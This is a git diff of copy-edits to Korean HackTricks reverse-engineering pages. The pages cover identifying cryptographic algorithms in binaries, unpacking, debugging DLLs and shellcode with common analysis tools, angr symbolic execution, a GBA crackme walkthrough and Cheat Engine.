+- **섞기 단계**: 이전에 생성된 테이블을 **반복**하며 (0x100 반복 루프) 각 값을 **반무작위** 바이트로 수정합니다. 이 반무작위 바이트를 생성하기 위해 RC4 **키가 사용됩니다**. RC4 **키**는 **1바이트에서 256바이트** 사이일 수 있지만, 일반적으로 5바이트 이상이 권장됩니다. 일반적으로 RC4 키는 16바이트입니다.
+- **XOR 단계**: 마지막으로, 평문 또는 암호문은 **이전에 생성된 값과 XOR됩니다**. 암호화 및 복호화 함수는 동일합니다. 이를 위해 **생성된 256바이트를 필요에 따라 반복**합니다. 이는 일반적으로 디컴파일된 코드에서 **%256 (mod 256)**으로 인식됩니다.
 
 > [!NOTE]
 > **디스어셈블리/디컴파일된 코드에서 RC4를 식별하기 위해 0x100 크기의 2개의 루프(키 사용)와 그 후에 입력 데이터를 2개의 루프에서 생성된 256값과 XOR하는 것을 확인할 수 있습니다. 아마도 %256 (mod 256)을 사용할 것입니다.**
@@ -88,7 +88,7 @@
 
 - **치환 상자 및 조회 테이블** 사용
 - **특정 조회 테이블 값**(상수)의 사용 덕분에 AES를 **구별할 수 있습니다**. _상수가 **이진 파일에 저장**되거나 _**동적으로 생성**될 수 있습니다._
-- **암호화 키**는 **16으로 나누어 떨어져야** 하며(일반적으로 32B) 일반적으로 16B의 **IV**가 사용됩니다.
+- **암호화 키**는 **16으로 나누어 떨어져야** 하며 (일반적으로 32B) 보통 **IV**는 16B가 사용됩니다.
 
 ### SBox 상수
 
@@ -98,21 +98,21 @@
 
 ### 특징
 
-- 이 알고리즘을 사용하는 악성코드를 찾는 것은 드물지만 예시가 있습니다(Ursnif)
-- 길이에 따라 알고리즘이 Serpent인지 여부를 쉽게 판단할 수 있습니다(매우 긴 함수)
+- 이 알고리즘을 사용하는 악성코드를 찾는 것은 드물지만 예시가 있습니다 (Ursnif)
+- 길이에 따라 알고리즘이 Serpent인지 여부를 쉽게 판단할 수 있습니다 (매우 긴 함수)
 
 ### 식별
 
-다음 이미지에서 상수 **0x9E3779B9**가 사용되는 것을 주목하세요(이 상수는 **TEA** - Tiny Encryption Algorithm과 같은 다른 암호 알고리즘에서도 사용됩니다).\
+다음 이미지에서 상수 **0x9E3779B9**가 사용되는 것을 주목하세요 (이 상수는 **TEA** - Tiny Encryption Algorithm과 같은 다른 암호 알고리즘에서도 사용됩니다).\
 또한 **루프의 크기**(**132**)와 **디스어셈블리** 명령어 및 **코드** 예제에서의 **XOR 연산 수**를 주목하세요:
 
 ![](<../../images/image (381).png>)
 
-앞서 언급했듯이 이 코드는 **매우 긴 함수**로 어떤 디컴파일러에서도 시각화될 수 있으며, 그 안에 **점프**가 없습니다. 디컴파일된 코드는 다음과 같이 보일 수 있습니다:
+앞서 언급했듯이, 이 코드는 **매우 긴 함수**로 어떤 디컴파일러에서도 시각화될 수 있으며, 그 안에 **점프**가 없습니다. 디컴파일된 코드는 다음과 같이 보일 수 있습니다:
 
 ![](<../../images/image (382).png>)
 
-따라서 **매직 넘버**와 **초기 XOR**를 확인하고 **매우 긴 함수**를 보고 **긴 함수의 일부 명령어를 구현과 비교**함으로써 이 알고리즘을 식별할 수 있습니다(예: 7로 왼쪽 시프트 및 22로 회전 왼쪽).
+따라서 **매직 넘버**와 **초기 XOR**를 확인하고, **매우 긴 함수**를 보고, **긴 함수의 일부 명령어를 구현과 비교**하여 이 알고리즘을 식별할 수 있습니다 (예: 7로 왼쪽 시프트 및 22로 왼쪽 회전).
 
 ## RSA **(비대칭 암호)**
 
@@ -126,8 +126,8 @@
 
 ![](<../../images/image (383).png>)
 
-- 왼쪽의 11번째 줄에는 `+7) >> 3`이 있으며, 이는 오른쪽의 35번째 줄과 동일합니다: `+7) / 8`
-- 왼쪽의 12번째 줄은 `modulus_len < 0x040`를 확인하고, 오른쪽의 36번째 줄은 `inputLen+11 > modulusLen`을 확인하고 있습니다.
+- 11번째 줄(왼쪽)에는 `+7) >> 3`가 있으며, 이는 35번째 줄(오른쪽)과 동일합니다: `+7) / 8`
+- 12번째 줄(왼쪽)은 `modulus_len < 0x040`를 확인하고, 36번째 줄(오른쪽)은 `inputLen+11 > modulusLen`을 확인합니다.
 
 ## MD5 & SHA (해시)
 
@@ -178,7 +178,7 @@ CRC 해시 알고리즘은 다음과 같습니다:
 
 ![](<../../images/image (207) (2) (1).png>)
 
-식별하기 위해 **3개의 비교**를 확인하세요:
+다음 **3개의 비교를 통해 인식할 수 있습니다**:
 
 ![](<../../images/image (384).png>)
 
diff --git a/src/reversing/cryptographic-algorithms/unpacking-binaries.md b/src/reversing/cryptographic-algorithms/unpacking-binaries.md
index 39a19a85e..1abe4f76b 100644
--- a/src/reversing/cryptographic-algorithms/unpacking-binaries.md
+++ b/src/reversing/cryptographic-algorithms/unpacking-binaries.md
@@ -11,13 +11,13 @@
 
 # 기본 권장 사항
 
-- **IDA에서 패킹된 바이너리를 아래에서 위로 분석하기 시작하세요**. 언팩커는 언팩된 코드가 종료되면 종료되므로 언팩커가 시작할 때 언팩된 코드로 실행을 전달할 가능성은 낮습니다.
-- **레지스터** 또는 **메모리**의 **영역**에 대한 **JMP** 또는 **CALL**을 검색하세요. 또한 **인수를 푸시하고 주소 방향을 지정한 다음 `retn`을 호출하는 함수**를 검색하세요. 이 경우 함수의 반환은 호출하기 전에 스택에 푸시된 주소를 호출할 수 있습니다.
-- `VirtualAlloc`에 **중단점**을 설정하세요. 이는 프로그램이 언팩된 코드를 쓸 수 있는 메모리 공간을 할당합니다. "사용자 코드로 실행"하거나 F8을 사용하여 **함수를 실행한 후 EAX 내부의 값을 가져오세요**. 그런 다음 "**덤프에서 해당 주소를 따르세요**". 언팩된 코드가 저장될 지역인지 알 수 없습니다.
+- **IDA에서 패킹된 바이너리를 아래에서 위로 분석하기 시작하세요**. 언패커는 언패킹된 코드가 종료되면 종료되므로 언패커가 시작할 때 언패킹된 코드로 실행을 전달할 가능성은 낮습니다.
+- **레지스터**나 **메모리**의 **영역**에 대한 **JMP** 또는 **CALL**을 검색하세요. 또한 **인수를 푸시하고 주소 방향을 지정한 후 `retn`을 호출하는 함수**를 검색하세요. 이 경우 함수의 반환은 호출하기 전에 스택에 푸시된 주소를 호출할 수 있습니다.
+- `VirtualAlloc`에 **중단점**을 설정하세요. 이는 프로그램이 언패킹된 코드를 쓸 수 있는 메모리 공간을 할당합니다. "사용자 코드로 실행"하거나 F8을 사용하여 **함수를 실행한 후 EAX 내부의 값을 가져오세요**. 그런 다음 "**덤프에서 해당 주소를 따르세요**". 언패킹된 코드가 저장될 지역인지 알 수 없습니다.
 - **`VirtualAlloc`**에 값 "**40**"을 인수로 사용하면 읽기+쓰기+실행을 의미합니다(여기에 실행이 필요한 코드가 복사될 것입니다).
-- **코드를 언팩하는 동안** **여러 호출**을 **산술 연산** 및 **`memcopy`** 또는 **`Virtual`**`Alloc`과 같은 함수에서 찾는 것이 일반적입니다. 만약 산술 연산만 수행하는 함수에 있다면, **함수의 끝을 찾으려고 시도하세요**(아마도 레지스터에 대한 JMP 또는 호출) **또는** 최소한 **마지막 함수에 대한 호출**을 찾고 그곳으로 실행하세요. 코드는 흥미롭지 않습니다.
-- 코드를 언팩하는 동안 **메모리 영역이 변경될 때마다 주의하세요**. 메모리 영역의 변경은 **언팩 코드의 시작**을 나타낼 수 있습니다. Process Hacker를 사용하여 메모리 영역을 쉽게 덤프할 수 있습니다(프로세스 --> 속성 --> 메모리).
-- 코드를 언팩하려고 할 때 **이미 언팩된 코드로 작업하고 있는지 아는 좋은 방법**은 **바이너리의 문자열을 확인하는 것입니다**. 만약 어떤 시점에 점프를 수행하고(아마도 메모리 영역을 변경하면서) **더 많은 문자열이 추가된 것을 발견하면**, **언팩된 코드로 작업하고 있다는 것을 알 수 있습니다**. 그러나 패커에 이미 많은 문자열이 포함되어 있다면 "http"라는 단어가 포함된 문자열의 수를 확인하고 이 숫자가 증가하는지 확인하세요.
+- **코드를 언패킹하는 동안** **여러 호출**을 **산술 연산** 및 **`memcopy`** 또는 **`Virtual`**`Alloc`과 같은 함수에서 찾는 것이 일반적입니다. 만약 산술 연산만 수행하는 함수에 있다면, **함수의 끝을 찾으려고 시도하세요**(아마도 레지스터에 대한 JMP 또는 호출일 수 있음) **또는** 최소한 **마지막 함수에 대한 호출**을 찾고 그곳으로 실행하세요. 코드가 흥미롭지 않기 때문입니다.
+- 코드를 언패킹하는 동안 **메모리 영역이 변경될 때마다 주의하세요**. 메모리 영역의 변경은 **언패킹 코드의 시작**을 나타낼 수 있습니다. Process Hacker를 사용하여 메모리 영역을 쉽게 덤프할 수 있습니다(프로세스 --> 속성 --> 메모리).
+- 코드를 언패킹하려고 할 때 **이미 언패킹된 코드로 작업하고 있는지 아는 좋은 방법**은 **바이너리의 문자열을 확인하는 것입니다**. 만약 어떤 시점에서 점프를 수행하고(아마도 메모리 영역을 변경하면서) **더 많은 문자열이 추가된 것을 발견하면**, **언패킹된 코드로 작업하고 있다는 것을 알 수 있습니다**. 그러나 패커에 이미 많은 문자열이 포함되어 있다면 "http"라는 단어가 포함된 문자열의 수를 확인하고 이 숫자가 증가하는지 확인하세요.
 - 메모리 영역에서 실행 파일을 덤프할 때 [PE-bear](https://github.com/hasherezade/pe-bear-releases/releases)를 사용하여 일부 헤더를 수정할 수 있습니다.
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/reversing/reversing-tools-basic-methods/README.md b/src/reversing/reversing-tools-basic-methods/README.md
index 9ccab26fa..ac9afd4de 100644
--- a/src/reversing/reversing-tools-basic-methods/README.md
+++ b/src/reversing/reversing-tools-basic-methods/README.md
@@ -43,7 +43,7 @@ dotPeek는 **라이브러리** (.dll), **Windows 메타데이터 파일** (.winm
 ### [ILSpy](https://github.com/icsharpcode/ILSpy) & [dnSpy](https://github.com/dnSpy/dnSpy/releases)
 
 [Visual Studio Code용 ILSpy 플러그인](https://github.com/icsharpcode/ilspy-vscode): 모든 OS에서 사용할 수 있습니다 (VSCode에서 직접 설치할 수 있으며, git을 다운로드할 필요가 없습니다. **Extensions**를 클릭하고 **ILSpy**를 검색하세요).\
-**디컴파일**, **수정** 및 **다시 컴파일**해야 하는 경우 [**dnSpy**](https://github.com/dnSpy/dnSpy/releases) 또는 그 활발히 유지되는 포크인 [**dnSpyEx**](https://github.com/dnSpyEx/dnSpy/releases)를 사용할 수 있습니다. (**우클릭 -> 메서드 수정**을 통해 함수 내부의 내용을 변경할 수 있습니다).
+**디컴파일**, **수정** 및 **다시 컴파일**해야 하는 경우 [**dnSpy**](https://github.com/dnSpy/dnSpy/releases) 또는 그 활발히 유지 관리되는 포크인 [**dnSpyEx**](https://github.com/dnSpyEx/dnSpy/releases)를 사용할 수 있습니다. (**우클릭 -> 메서드 수정**하여 함수 내부의 내용을 변경합니다).
 
 ### DNSpy 로깅
 
@@ -125,7 +125,7 @@ iisreset /noforce
 
 ![](<../../images/image (704).png>)
 
-그런 다음 디버깅을 시작하면 **각 DLL이 로드될 때 실행이 중지됩니다**, 그런 다음 rundll32가 DLL을 로드하면 실행이 중지됩니다.
+그런 다음 디버깅을 시작하면 **각 DLL이 로드될 때 실행이 중지**됩니다. 그런 다음 rundll32가 DLL을 로드하면 실행이 중지됩니다.
 
 하지만 로드된 DLL의 코드에 어떻게 접근할 수 있을까요? 이 방법을 사용하면 잘 모르겠습니다.
 
@@ -134,17 +134,17 @@ iisreset /noforce
 - **rundll32 로드** (64비트는 C:\Windows\System32\rundll32.exe, 32비트는 C:\Windows\SysWOW64\rundll32.exe)
 - **명령줄 변경** (_File --> Change Command Line_) 및 DLL 경로와 호출할 함수를 설정합니다. 예: "C:\Windows\SysWOW64\rundll32.exe" "Z:\shared\Cybercamp\rev2\\\14.ridii_2.dll",DLLMain
 - _Options --> Settings_에서 "**DLL Entry**"를 선택합니다.
-- 그런 다음 **실행 시작**하면 디버거가 각 DLL 메인에서 중지되며, 어느 시점에서 **당신의 DLL의 DLL Entry에서 중지됩니다**. 거기서 중단점을 설정하고 싶은 지점을 검색하면 됩니다.
+- 그런 다음 **실행 시작**하면 디버거가 각 DLL 메인에서 중지되며, 어느 시점에서 **당신의 DLL의 DLL Entry에서 중지**됩니다. 거기서 중단점을 설정하고 싶은 지점을 검색하면 됩니다.
 
 실행이 어떤 이유로 win64dbg에서 중지되면 **어떤 코드에 있는지** win64dbg 창의 **상단**에서 확인할 수 있습니다:
 
 ![](<../../images/image (842).png>)
 
-그런 다음, 이 정보를 통해 디버깅하려는 DLL에서 실행이 중지된 시점을 확인할 수 있습니다.
+그런 다음 이 정보를 통해 디버깅하려는 DLL에서 실행이 중지된 시점을 확인할 수 있습니다.
 
 ## GUI 앱 / 비디오 게임
 
-[**Cheat Engine**](https://www.cheatengine.org/downloads.php)는 실행 중인 게임의 메모리 내에서 중요한 값이 저장된 위치를 찾고 이를 변경하는 데 유용한 프로그램입니다. 더 많은 정보는:
+[**Cheat Engine**](https://www.cheatengine.org/downloads.php)는 실행 중인 게임의 메모리 내에서 중요한 값이 저장된 위치를 찾고 이를 변경하는 데 유용한 프로그램입니다. 자세한 정보는:
 
 {{#ref}}
 cheat-engine.md
@@ -163,7 +163,7 @@ cheat-engine.md
 ### blobrunner로 쉘코드 디버깅
 
 [**Blobrunner**](https://github.com/OALabs/BlobRunner)는 **쉘코드**를 메모리 공간에 **할당**하고, 쉘코드가 할당된 **메모리 주소**를 **지시**하며 실행을 **중지**합니다.\
-그런 다음, 프로세스에 **디버거**(Ida 또는 x64dbg)를 연결하고 **지정된 메모리 주소에 중단점**을 설정한 후 실행을 **재개**해야 합니다. 이렇게 하면 쉘코드를 디버깅할 수 있습니다.
+그런 다음 프로세스에 **디버거**(Ida 또는 x64dbg)를 연결하고 **지정된 메모리 주소에 중단점**을 설정한 후 실행을 **재개**해야 합니다. 이렇게 하면 쉘코드를 디버깅할 수 있습니다.
 
 릴리스 github 페이지에는 컴파일된 릴리스를 포함하는 zip 파일이 있습니다: [https://github.com/OALabs/BlobRunner/releases/tag/v0.0.5](https://github.com/OALabs/BlobRunner/releases/tag/v0.0.5)\
 다음 링크에서 Blobrunner의 약간 수정된 버전을 찾을 수 있습니다. 컴파일하려면 **Visual Studio Code에서 C/C++ 프로젝트를 생성하고 코드를 복사하여 붙여넣고 빌드**하면 됩니다.
@@ -194,14 +194,14 @@ Cutter는 "파일 열기"와 "쉘코드 열기"를 허용합니다. 제 경우
 
 ![](<../../images/image (387).png>)
 
-예를 들어, 헥스 덤프 내에서 스택을 확인할 수 있습니다:
+예를 들어 헥스 덤프 내에서 스택을 확인할 수 있습니다:
 
 ![](<../../images/image (186).png>)
 
 ### 쉘코드 디코딩 및 실행된 함수 가져오기
 
 [**scdbg**](http://sandsprite.com/blogs/index.php?uid=7&pid=152)를 시도해 보세요.\
-쉘코드가 사용하는 **함수**와 쉘코드가 메모리에서 **자기 자신을 디코딩**하는지 여부와 같은 정보를 알려줍니다.
+이 도구는 쉘코드가 사용하는 **함수**와 쉘코드가 메모리에서 **자기 자신을 디코딩**하는지 여부를 알려줍니다.
 ```bash
 scdbg.exe -f shellcode # Get info
 scdbg.exe -f shellcode -r #show analysis report at end of run
@@ -214,9 +214,9 @@ scDbg는 선택한 옵션을 선택하고 shellcode를 실행할 수 있는 그
 
 ![](<../../images/image (258).png>)
 
-**Create Dump** 옵션은 메모리에서 shellcode에 동적으로 변경이 이루어질 경우 최종 shellcode를 덤프합니다(디코딩된 shellcode를 다운로드하는 데 유용합니다). **start offset**은 특정 오프셋에서 shellcode를 시작하는 데 유용할 수 있습니다. **Debug Shell** 옵션은 scDbg 터미널을 사용하여 shellcode를 디버깅하는 데 유용합니다(하지만 이 문제에 대해서는 이전에 설명한 옵션이 더 좋다고 생각합니다. Ida 또는 x64dbg를 사용할 수 있습니다).
+**Create Dump** 옵션은 메모리에서 shellcode에 동적으로 변경이 이루어질 경우 최종 shellcode를 덤프합니다(디코딩된 shellcode를 다운로드하는 데 유용합니다). **start offset**은 특정 오프셋에서 shellcode를 시작하는 데 유용할 수 있습니다. **Debug Shell** 옵션은 scDbg 터미널을 사용하여 shellcode를 디버깅하는 데 유용하지만, 이 문제에 대해서는 이전에 설명한 옵션들이 더 나은 것 같습니다. 왜냐하면 Ida나 x64dbg를 사용할 수 있기 때문입니다.
 
-### CyberChef를 사용한 디스어셈블링
+### CyberChef를 사용한 역어셈블링
 
 shellcode 파일을 입력으로 업로드하고 다음 레시피를 사용하여 디컴파일합니다: [https://gchq.github.io/CyberChef/#recipe=To_Hex('Space',0)Disassemble_x86('32','Full%20x86%20architecture',16,0,true,true)](<https://gchq.github.io/CyberChef/#recipe=To_Hex('Space',0)Disassemble_x86('32','Full%20x86%20architecture',16,0,true,true)>)
 
@@ -227,7 +227,7 @@ shellcode 파일을 입력으로 업로드하고 다음 레시피를 사용하
 - [https://www.youtube.com/watch?v=2VF_wPkiBJY](https://www.youtube.com/watch?v=2VF_wPkiBJY)
 - [https://github.com/xoreaxeaxeax/movfuscator/blob/master/slides/domas_2015_the_movfuscator.pdf](https://github.com/xoreaxeaxeax/movfuscator/blob/master/slides/domas_2015_the_movfuscator.pdf)
 
-운이 좋다면 [demovfuscator](https://github.com/kirschju/demovfuscator)가 이진 파일을 디오프스케이트할 것입니다. 여러 종속성이 있습니다.
+운이 좋다면 [demovfuscator](https://github.com/kirschju/demovfuscator)가 이진 파일의 난독화를 해제할 것입니다. 여러 종속성이 있습니다.
 ```
 apt-get install libcapstone-dev
 apt-get install libz3-dev
@@ -242,8 +242,8 @@ apt-get install libz3-dev
 
 ![](<../../images/image (1080).png>)
 
-이 경우 바이너리 이름은 authenticator였으므로, 이것이 흥미로운 메인 함수라는 것은 분명합니다.\
-호출되는 **함수**의 **이름**을 가지고, **인터넷**에서 검색하여 그들의 **입력**과 **출력**에 대해 알아보세요.
+이 경우 바이너리 이름이 authenticator였으므로, 이것이 흥미로운 메인 함수라는 것은 분명합니다.\
+호출되는 **함수**의 **이름**을 가지고, 그들의 **입력**과 **출력**에 대해 배우기 위해 **인터넷**에서 검색하세요.
 
 ## **Delphi**
 
@@ -255,7 +255,7 @@ Delphi 바이너리를 리버스해야 한다면 IDA 플러그인 [https://githu
 
 이 플러그인은 바이너리를 실행하고 디버깅 시작 시 함수 이름을 동적으로 해결합니다. 디버깅을 시작한 후 다시 시작 버튼(녹색 버튼 또는 f9)을 누르면 실제 코드의 시작 부분에서 중단점이 걸립니다.
 
-그래픽 애플리케이션에서 버튼을 누르면 디버거가 해당 버튼에 의해 실행된 함수에서 중단되는 것도 매우 흥미롭습니다.
+그래픽 애플리케이션에서 버튼을 누르면 디버거가 해당 버튼에 의해 실행된 함수에서 중단됩니다.
 
 ## Golang
 
@@ -275,7 +275,7 @@ Golang 바이너리를 리버스해야 한다면 IDA 플러그인 [https://githu
 
 ## GBA - 게임 바디 어드밴스
 
-GBA 게임의 **바이너리**를 얻으면 다양한 도구를 사용하여 **에뮬레이트**하고 **디버그**할 수 있습니다:
+GBA 게임의 **바이너리**를 얻으면 다양한 도구를 사용하여 **에뮬레이트**하고 **디버깅**할 수 있습니다:
 
 - [**no$gba**](https://problemkaputt.de/gba.htm) (_디버그 버전 다운로드_) - 인터페이스가 있는 디버거 포함
 - [**mgba** ](https://mgba.io) - CLI 디버거 포함
@@ -303,9 +303,9 @@ L = 256
 
 ![](<../../images/image (447).png>)
 
-이전 이미지에서 이 함수가 **FUN_080015a8**에서 호출되는 것을 볼 수 있습니다 (주소: _0x080015fa_ 및 _0x080017ac_).
+이전 이미지에서 함수가 **FUN_080015a8**에서 호출되는 것을 볼 수 있습니다 (주소: _0x080015fa_ 및 _0x080017ac_).
 
-그 함수에서는 몇 가지 초기화 작업(중요하지 않음) 후에:
+해당 함수에서는 몇 가지 초기화 작업(중요하지 않음) 후에:
 ```c
 void FUN_080015a8(void)
 
@@ -369,7 +369,7 @@ DAT_030000d8 = DAT_030000d8 + 0x3a;
 이전 코드에서 **uVar1** (누른 버튼의 **값**이 있는 곳)을 몇 가지 값과 비교하는 것을 볼 수 있습니다:
 
 - 먼저, **값 4** (**SELECT** 버튼)와 비교됩니다: 이 버튼은 화면을 지웁니다.
-- 다음으로, **값 8** (**START** 버튼)과 비교됩니다: 이 버튼은 코드가 플래그를 얻기 위한 유효한지 확인합니다.
+- 그 다음, **값 8** (**START** 버튼)과 비교됩니다: 이 버튼은 코드가 플래그를 얻기 위한 유효한지 확인합니다.
 - 이 경우 **`DAT_030000d8`** 변수가 0xf3과 비교되며, 값이 같으면 일부 코드가 실행됩니다.
 - 다른 경우에는 일부 cont (`DAT_030000d4`)가 확인됩니다. 이는 코드에 들어간 직후 1을 더하기 때문에 cont입니다.\
 **8보다 작으면** **`DAT_030000d8`**에 값을 **더하는** 작업이 수행됩니다 (기본적으로 cont가 8보다 작을 때 이 변수에 눌린 키의 값을 더하고 있습니다).
diff --git a/src/reversing/reversing-tools-basic-methods/angr/README.md b/src/reversing/reversing-tools-basic-methods/angr/README.md
index b44f3345d..493db94de 100644
--- a/src/reversing/reversing-tools-basic-methods/angr/README.md
+++ b/src/reversing/reversing-tools-basic-methods/angr/README.md
@@ -1,6 +1,6 @@
 {{#include ../../../banners/hacktricks-training.md}}
 
-이 치트시트의 일부는 [angr 문서](https://docs.angr.io/_/downloads/en/stable/pdf/)를 기반으로 합니다.
+이 치트 시트의 일부는 [angr documentation](https://docs.angr.io/_/downloads/en/stable/pdf/)을 기반으로 합니다.
 
 # 설치
 ```bash
@@ -119,9 +119,9 @@ simgr.active[0].regs.rip #Get RIP from the last state
 ```
 ## 함수 호출
 
-- `entry_state`와 `full_init_state`에 `args`를 통해 인수 목록을 전달하고 `env`를 통해 환경 변수의 사전을 전달할 수 있습니다. 이러한 구조의 값은 문자열 또는 비트벡터일 수 있으며, 시뮬레이션된 실행의 인수 및 환경으로 상태에 직렬화됩니다. 기본 `args`는 빈 목록이므로, 분석 중인 프로그램이 최소한 `argv[0]`을 찾기를 기대하는 경우 항상 제공해야 합니다!
-- `argc`를 심볼릭으로 설정하려면, `entry_state`와 `full_init_state` 생성자에 심볼릭 비트벡터를 `argc`로 전달할 수 있습니다. 그러나 주의하세요: 이렇게 하면, `args`에 전달한 인수의 수보다 `argc`의 값이 클 수 없다는 제약 조건을 결과 상태에 추가해야 합니다.
-- 호출 상태를 사용하려면 `.call_state(addr, arg1, arg2, ...)`로 호출해야 하며, 여기서 `addr`은 호출하려는 함수의 주소이고 `argN`은 해당 함수에 대한 N번째 인수로, 파이썬 정수, 문자열, 배열 또는 비트벡터로 전달할 수 있습니다. 메모리를 할당하고 실제로 객체에 대한 포인터를 전달하려면, 이를 PointerWrapper로 감싸야 합니다. 즉, `angr.PointerWrapper("point to me!")`와 같이 사용합니다. 이 API의 결과는 다소 예측할 수 없지만, 우리는 이를 개선하고 있습니다.
+- `entry_state`와 `full_init_state`에 `args`를 통해 인수 목록을, `env`를 통해 환경 변수의 사전을 전달할 수 있습니다. 이러한 구조의 값은 문자열 또는 비트벡터일 수 있으며, 시뮬레이션된 실행의 인수와 환경으로 상태에 직렬화됩니다. 기본 `args`는 빈 목록이므로, 분석 중인 프로그램이 최소한 `argv[0]`을 찾기를 기대한다면 항상 제공해야 합니다!
+- `argc`를 심볼릭으로 설정하고 싶다면, `entry_state`와 `full_init_state` 생성자에 심볼릭 비트벡터를 `argc`로 전달할 수 있습니다. 그러나 주의해야 합니다: 이렇게 할 경우, `argc`에 대한 값이 `args`에 전달한 인수의 수보다 클 수 없다는 제약 조건을 결과 상태에 추가해야 합니다.
+- 호출 상태를 사용하려면 `.call_state(addr, arg1, arg2, ...)`로 호출해야 하며, 여기서 `addr`은 호출하려는 함수의 주소이고 `argN`은 해당 함수에 대한 N번째 인수로, 파이썬 정수, 문자열, 배열 또는 비트벡터일 수 있습니다. 메모리를 할당하고 실제로 객체에 대한 포인터를 전달하려면, 이를 PointerWrapper로 감싸야 합니다. 즉, `angr.PointerWrapper("point to me!")`와 같이 사용합니다. 이 API의 결과는 다소 예측할 수 없지만, 우리는 이를 개선하고 있습니다.
 
 ## 비트벡터
 ```python
@@ -184,7 +184,7 @@ True
 >>> proj.is_hooked(0x20000)
 True
 ```
-또한, `proj.hook_symbol(name, hook)`을 사용하여 기호의 이름을 첫 번째 인수로 제공함으로써 기호가 존재하는 주소를 후킹할 수 있습니다.
+또한, `proj.hook_symbol(name, hook)`을 사용하여 기호의 이름을 첫 번째 인수로 제공함으로써 기호가 위치한 주소를 후킹할 수 있습니다.
 
 # 예시
 
diff --git a/src/reversing/reversing-tools-basic-methods/angr/angr-examples.md b/src/reversing/reversing-tools-basic-methods/angr/angr-examples.md
index 556dd58fa..718784621 100644
--- a/src/reversing/reversing-tools-basic-methods/angr/angr-examples.md
+++ b/src/reversing/reversing-tools-basic-methods/angr/angr-examples.md
@@ -381,33 +381,33 @@ if __name__ == '__main__':
 main(sys.argv)
 ```
 > [!NOTE]
-> 심볼릭 파일은 심볼릭 데이터와 병합된 상수 데이터를 포함할 수도 있습니다:
+> 기호 파일은 기호 데이터와 병합된 상수 데이터를 포함할 수도 있습니다:
 >
 > ```python
 >   # Hello world, my name is John.
 >   # ^                       ^
->   # ^ address 0             ^ address 24 (문자 수를 세세요)
+>   # ^ 주소 0                ^ 주소 24 (문자 수를 세세요)
 >   # 이를 메모리에 표현하기 위해, 문자열을
 >   # 파일의 시작 부분에 쓰고 싶습니다:
 >   #
 >   # hello_txt_contents = claripy.BVV('Hello world, my name is John.', 30*8)
 >   #
 >   # 아마도, 우리는 John을
->   # 심볼릭 변수로 바꾸고 싶을 것입니다. 우리는 호출할 것입니다:
+>   # 기호 변수로 바꾸고 싶을 것입니다. 우리는 호출할 것입니다:
 >   #
 >   # name_bitvector = claripy.BVS('symbolic_name', 4*8)
 >   #
 >   # 그런 다음, 프로그램이 fopen('hello.txt', 'r')를 호출하고
 >   # fread(buffer, sizeof(char), 30, hello_txt_file)를 호출하면, 버퍼는
->   # 파일에서 문자열을 포함하게 되며, 이름이 저장될 네 개의 심볼릭 바이트를 제외합니다.
+>   # 파일에서 문자열을 포함하게 되며, 이름이 저장될 네 개의 기호 바이트를 제외합니다.
 >   # (!)
 > ```
 
 ### 제약 조건 적용
 
 > [!NOTE]
-> 때때로 길이 16의 두 단어를 **문자별로** 비교하는 간단한 인간 작업은 (루프) **angr**에 많은 비용이 듭니다. 왜냐하면 이는 **지수적으로** 분기를 생성해야 하기 때문입니다. 각 if마다 1개의 분기를 생성하므로: `2^16`\
-> 따라서, **angr에게 이전 지점으로 가도록 요청하는 것이** 더 쉽고 (실제 어려운 부분이 이미 완료된 곳) **그 제약 조건을 수동으로 설정하는 것이** 더 쉽습니다.
+> 때때로 16 길이의 두 단어를 **문자별로** 비교하는 간단한 인간 작업은 (루프) **angr**에 많은 비용이 듭니다. 왜냐하면 그것은 **지수적으로** 분기를 생성해야 하기 때문입니다. 각 if마다 1개의 분기를 생성하므로: `2^16`\
+> 따라서, **angr에게 이전 지점으로 가달라고 요청하는 것이** 더 쉽고 (실제 어려운 부분이 이미 완료된 곳) **그 제약 조건을 수동으로 설정하는 것이** 더 쉽습니다.
 ```python
 # After perform some complex poperations to the input the program checks
 # char by char the password against another password saved, like in the snippet:
@@ -593,7 +593,7 @@ raise Exception('Could not find the solution')
 if __name__ == '__main__':
 main(sys.argv)
 ```
-### 함수 후킹 / Simprocedure
+### 함수 훅킹 / Simprocedure
 ```python
 # Hook to the function called check_equals_WQNDNKKWAWOLXBAC
 
@@ -677,7 +677,7 @@ raise Exception('Could not find the solution')
 if __name__ == '__main__':
 main(sys.argv)
 ```
-### 여러 매개변수를 가진 scanf 시뮬레이션
+### 여러 매개변수로 scanf 시뮬레이션하기
 ```python
 # This time, the solution involves simply replacing scanf with our own version,
 # since Angr does not support requesting multiple parameters with scanf.
diff --git a/src/reversing/reversing-tools-basic-methods/cheat-engine.md b/src/reversing/reversing-tools-basic-methods/cheat-engine.md
index 1d75b82b5..bb2f3dd73 100644
--- a/src/reversing/reversing-tools-basic-methods/cheat-engine.md
+++ b/src/reversing/reversing-tools-basic-methods/cheat-engine.md
@@ -3,14 +3,14 @@
 {{#include ../../banners/hacktricks-training.md}}
 
 [**Cheat Engine**](https://www.cheatengine.org/downloads.php)는 실행 중인 게임의 메모리 내에서 중요한 값이 저장된 위치를 찾고 이를 변경하는 데 유용한 프로그램입니다.\
-다운로드하여 실행하면 도구 사용 방법에 대한 **튜토리얼**이 **제공**됩니다. 도구 사용법을 배우고 싶다면 이를 완료하는 것이 강력히 권장됩니다.
+다운로드하고 실행하면 도구 사용 방법에 대한 **튜토리얼**이 **제공**됩니다. 도구 사용법을 배우고 싶다면 이를 완료하는 것이 강력히 권장됩니다.
 
 ## 무엇을 검색하고 있나요?
 
 ![](<../../images/image (762).png>)
 
 이 도구는 프로그램의 메모리 내에서 **어떤 값**(보통 숫자)이 **저장된 위치**를 찾는 데 매우 유용합니다.\
-**보통 숫자**는 **4bytes** 형식으로 저장되지만, **double** 또는 **float** 형식으로도 찾을 수 있으며, **숫자와 다른 것**을 찾고 싶을 수도 있습니다. 그러므로 **검색할 항목**을 **선택**해야 합니다:
+**보통 숫자**는 **4bytes** 형식으로 저장되지만, **double** 또는 **float** 형식으로도 찾을 수 있으며, **숫자와 다른 것**을 찾고 싶을 수도 있습니다. 그런 이유로 **검색할 항목**을 **선택**해야 합니다:
 
 ![](<../../images/image (324).png>)
 
@@ -55,17 +55,17 @@ _**Edit --> Settings --> Hotkeys**_에서 **게임**을 **중지**하는 것과
 ![](<../../images/image (684).png>)
 
 Cheat Engine은 **100에서 새로운 값으로 변경된** **값**을 검색합니다. 축하합니다, 당신은 찾고 있던 **값의 주소**를 **찾았습니다**, 이제 이를 수정할 수 있습니다.\
